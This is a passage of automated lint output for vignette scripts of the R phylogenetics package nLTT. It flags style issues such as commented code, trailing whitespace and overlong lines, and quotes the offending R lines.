superfluous.**\n```r\n​\n^\n```\n[inst/doc/vignette_get_average_nltt.R:1:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_average_nltt.R#L1) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:3:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_average_nltt.R#L3) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:9:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_average_nltt.R#L9) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:13:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_average_nltt.R#L13) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:16:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_average_nltt.R#L16) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:19:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_average_nltt.R#L19) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:23:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_average_nltt.R#L23) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:26:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_average_nltt.R#L26) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:29:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_average_nltt.R#L29) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:31:47:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_average_nltt.R#L31) *style:* **Trailing whitespace is superfluous.**\n```r\n​  nLTT::get_phylogeny_nltt_matrix(phylogeny1), \n                                              ^\n```\n[inst/doc/vignette_get_average_nltt.R:32:13:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_average_nltt.R#L32) *style:* **Trailing whitespace is superfluous.**\n```r\n​  dt = 0.20, \n            ^\n```\n[inst/doc/vignette_get_average_nltt.R:36:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_average_nltt.R#L36) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:38:47:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_average_nltt.R#L38) *style:* **Trailing whitespace is superfluous.**\n```r\n​  nLTT::get_phylogeny_nltt_matrix(phylogeny2), \n                                              ^\n```\n[inst/doc/vignette_get_average_nltt.R:39:13:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_average_nltt.R#L39) *style:* **Trailing whitespace is superfluous.**\n```r\n​  dt = 0.20, \n            ^\n```\n[inst/doc/vignette_get_average_nltt.R:43:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_average_nltt.R#L43) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:46:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_average_nltt.R#L46) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:49:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_average_nltt.R#L49) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:57:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_average_nltt.R#L57) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:61:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_average_nltt.R#L61) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:64:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_average_nltt.R#L64) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:67:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_average_nltt.R#L67) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:71:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_average_nltt.R#L71) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:74:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_average_nltt.R#L74) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:77:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_average_nltt.R#L77) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:79:47:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_average_nltt.R#L79) *style:* **Trailing whitespace is superfluous.**\n```r\n​  nLTT::get_phylogeny_nltt_matrix(phylogeny1), \n                                              ^\n```\n[inst/doc/vignette_get_average_nltt.R:80:13:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_average_nltt.R#L80) *style:* **Trailing whitespace is superfluous.**\n```r\n​  dt = 0.20, \n            ^\n```\n[inst/doc/vignette_get_average_nltt.R:84:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_average_nltt.R#L84) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:86:47:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_average_nltt.R#L86) *style:* **Trailing whitespace is superfluous.**\n```r\n​  nLTT::get_phylogeny_nltt_matrix(phylogeny2), \n                                              ^\n```\n[inst/doc/vignette_get_average_nltt.R:87:13:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_average_nltt.R#L87) *style:* **Trailing whitespace is superfluous.**\n```r\n​  dt = 0.20, \n            ^\n```\n[inst/doc/vignette_get_average_nltt.R:91:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_average_nltt.R#L91) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:94:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_average_nltt.R#L94) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:96:29:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_average_nltt.R#L96) *style:* **Trailing whitespace is superfluous.**\n```r\n​  c(phylogeny1, phylogeny2), \n                            ^\n```\n[inst/doc/vignette_get_average_nltt.R:97:13:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_average_nltt.R#L97) *style:* **Trailing whitespace is superfluous.**\n```r\n​  dt = 0.20, \n            ^\n```\n[inst/doc/vignette_get_average_nltt.R:100:1:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_average_nltt.R#L100) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/doc/vignette_get_nltt_values.R:1:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L1) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:8:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L8) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:15:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L15) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:17:1:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L17) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​add.scale.bar()\n^~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:19:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L19) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:22:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L22) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:26:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L26) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:28:1:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L28) *style:* **lines should not be more than 80 characters.**\n```r\n​qplot(time, N, data = df, geom = \"step\", ylim = c(0,1), direction = \"vh\", main = \"NLTT plot of phylogeny 1\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:28:53:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L28) *style:* **Commas should always have a space after.**\n```r\n​qplot(time, N, data = df, geom = \"step\", ylim = c(0,1), direction = \"vh\", main = \"NLTT plot of phylogeny 1\")\n                                                    ^\n```\n[inst/doc/vignette_get_nltt_values.R:30:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L30) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:32:1:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L32) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​add.scale.bar()\n^~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:34:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L34) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:37:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L37) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:41:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L41) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:43:1:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n​qplot(time, N, data = df, geom = \"step\", ylim = c(0,1), direction = \"vh\", main = \"NLTT plot of phylogeny 2\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:43:53:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L43) *style:* **Commas should always have a space after.**\n```r\n​qplot(time, N, data = df, geom = \"step\", ylim = c(0,1), direction = \"vh\", main = \"NLTT plot of phylogeny 2\")\n                                                    ^\n```\n[inst/doc/vignette_get_nltt_values.R:45:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L45) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:46:1:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L46) *style:* **lines should not be more than 80 characters.**\n```r\n​t <- nLTT::stretch_nltt_matrix(nLTT::get_phylogeny_nltt_matrix(phylogeny1), dt = 0.20, step_type = \"upper\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:49:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L49) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:50:1:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L50) *style:* **lines should not be more than 80 characters.**\n```r\n​t <- nLTT::stretch_nltt_matrix(nLTT::get_phylogeny_nltt_matrix(phylogeny2), dt = 0.20, step_type = \"upper\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:53:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L53) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:57:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L57) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:60:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L60) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:61:41:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L61) *style:* **Commas should always have a space after.**\n```r\n​t <- nLTT::get_nltt_values(c(phylogeny1,phylogeny2), dt = 0.2)\n                                        ^\n```\n[inst/doc/vignette_get_nltt_values.R:64:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L64) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:65:42:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L65) *style:* **Commas should always have a space after.**\n```r\n​df <- nLTT::get_nltt_values(c(phylogeny1,phylogeny2), dt = 0.01)\n                                         ^\n```\n[inst/doc/vignette_get_nltt_values.R:67:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L67) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:68:1:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L68) *style:* **lines should not be more than 80 characters.**\n```r\n​qplot(t, nltt, data = df, geom = \"point\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\", color = id, size = I(0.1)) + \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:68:54:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L68) *style:* **Commas should always have a space after.**\n```r\n​qplot(t, nltt, data = df, geom = \"point\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\", color = id, size = I(0.1)) + \n                                                     ^\n```\n[inst/doc/vignette_get_nltt_values.R:68:129:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L68) *style:* **Trailing whitespace is superfluous.**\n```r\n​qplot(t, nltt, data = df, geom = \"point\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\", color = id, size = I(0.1)) + \n                                                                                                                                ^\n```\n[inst/doc/vignette_get_nltt_values.R:71:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L71) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:72:1:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L72) *style:* **lines should not be more than 80 characters.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\") + \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:72:54:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L72) *style:* **Commas should always have a space after.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\") + \n                                                     ^\n```\n[inst/doc/vignette_get_nltt_values.R:72:102:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L72) *style:* **Trailing whitespace is superfluous.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\") + \n                                                                                                     ^\n```\n[inst/doc/vignette_get_nltt_values.R:75:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L75) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:77:1:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L77) *style:* **lines should not be more than 80 characters.**\n```r\n​newick2 <- \"((((XD:1,ZD:1):1,CE:2):1,(FE:2,EE:2):1):4,((AE:1,BE:1):1,(WD:1,YD:1):1):5);\"\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:82:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L82) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n 